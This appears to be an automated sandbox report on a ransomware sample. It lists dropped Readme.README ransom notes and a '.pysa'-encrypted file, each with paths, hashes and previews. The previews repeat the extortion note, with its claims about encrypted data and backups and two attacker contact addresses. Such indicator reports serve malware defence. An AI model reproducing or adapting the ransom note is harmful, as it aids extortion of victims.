                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Packages\adobe.acrobatreaderdc.protectedmode\AC\Temp\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1066
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:24:6/8w4ArlF0COjBJyPSyoYno8w4ArlF0COjBJyPSyoYnF:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLF
                  MD5:568DB4D05550FA45C36D5A6CE51B3C1E
                  SHA1:8BD03084D1422DBA44D3A33496497399305DF033
                  SHA-256:6186A0A5B859E4539987E870440C03FFDE12E2846E78AE22B614953326496B78
                  SHA-512:15F8D0418C868E84B550741E4F14277C8F171DEC2A7A7D06BC3DA0B969D9908E95C244AE939164F18C1374C74B566AA3DFC92733064B349422654A3688023EC6
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Packages\adobe.acrobatreaderdc.protectedmode\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1599
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLF
                  MD5:33BAEE98E6812F33006EC1904131C43E
                  SHA1:6B21E5528FF8A4B3B5F2D1AC2E3D1849C273B648
                  SHA-256:81E8B5A8328AA847298DEE38F3C49EB5331F19C1E585E692AC61E1EDA731801A
                  SHA-512:3749BAE2D1F62FDB0758F23C75D14B3521825606513DD03C9B3CC1741A3E9A75FE519B3EF61302FBCD172F4CA8E325716897DFBE6B8B15246821E3034955162D
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\AC\INetCache\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\AC\INetCookies\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\AC\INetHistory\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\AC\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1066
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:24:6/8w4ArlF0COjBJyPSyoYno8w4ArlF0COjBJyPSyoYnF:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLF
                  MD5:568DB4D05550FA45C36D5A6CE51B3C1E
                  SHA1:8BD03084D1422DBA44D3A33496497399305DF033
                  SHA-256:6186A0A5B859E4539987E870440C03FFDE12E2846E78AE22B614953326496B78
                  SHA-512:15F8D0418C868E84B550741E4F14277C8F171DEC2A7A7D06BC3DA0B969D9908E95C244AE939164F18C1374C74B566AA3DFC92733064B349422654A3688023EC6
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\AC\Temp\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\AppData\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\LocalCache\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\LocalState\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1066
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:24:6/8w4ArlF0COjBJyPSyoYno8w4ArlF0COjBJyPSyoYnF:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLF
                  MD5:568DB4D05550FA45C36D5A6CE51B3C1E
                  SHA1:8BD03084D1422DBA44D3A33496497399305DF033
                  SHA-256:6186A0A5B859E4539987E870440C03FFDE12E2846E78AE22B614953326496B78
                  SHA-512:15F8D0418C868E84B550741E4F14277C8F171DEC2A7A7D06BC3DA0B969D9908E95C244AE939164F18C1374C74B566AA3DFC92733064B349422654A3688023EC6
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\RoamingState\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\Settings\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\Settings\settings.dat.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):9216
                  Entropy (8bit):7.682538196165285
                  Encrypted:false
                  SSDEEP:192:FX2TR5+Xy0QbQQubwSSNzhlVAneUwNkmsEQ48ApEoTLxflCve2lZp7:F2l504QRwlllSneUwNkm6kVfAvrF7
                  MD5:C2CBD38FD696DB1ABC1F2DF02E9D4094
                  SHA1:824F5E39BF8B0C4C165A866DF0A1C3796D66BC65
                  SHA-256:56BB42236DF8DAA599F781FA3111B66AFE18114CA3B960AD274A5D4B26491E76
                  SHA-512:569181D4899656A927F824BC1094E2D9021C7FD052CB564FC8CAF6BB0F98A8222FAA9896FDF6FA29FECB03010AB162320706EB43EE4D6006E6382C79C7E289DD
                  Malicious:false
                  Preview: ..(4-*...9...a...M.P!..l.}.s...6@..^..t......2...]..."..Z...&dn..!WB.yE/ .?..R.....%s.@..3.3D....M..z..7.a..k[.r...X..2.."...(:. .W.Y0_.g.S.bo.....r...t.....U...{...s.a.....Jx.Z...).....-.ed...W..."|y.\.^*7!....g...H... .B......ju?.E..NU...m.V...|.YU3....~.*.e.;..y....T.[.....t:...a.b.i...qc...}.....y.g..8.H#A..P.X.o.....3./=}.......M..;?.BO1E......f."I@n..C... ...........>i....k..Y&.?..~m..+..$...3.V.i.VB-..v.|...m....Uy;...)...}...i.b.f.!..h.8ir..../.2_..;F9......f*nTCD...o1iM;.7...1..Y.`..Z:...'...F.....x..........G....^y`m;pU>%...4......gEb..hG..!Yp|?~.Ewlv..}(.@..W}...`V........?.'M....S.&.]...u.`k~?..i..S.h..e>....P^..i.T.g.w...4Pv..pP..>._.1....2.....~'..w.(.z.&........t..T...H.?../...-.^LKk$.5..z.....s....9...*.....j...,/K.|....0...W...\.~YR.Z.6p.R.f..M@...$..e.............y..B.....d...WN...F..W..Q]Pb\.C<..Id...)OK..5a....G.k"2..b...I..Z.5..Av.$..1...b..0..h0..V..#....B..T.lC.Y... .8...o.E..KSW.@.Q.....GYfZX....1}...s)W.....
                  C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\SystemAppData\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\TempState\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\AC\INetCache\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\AC\INetCookies\ESE\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\AC\INetCookies\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\AC\INetHistory\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\AC\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
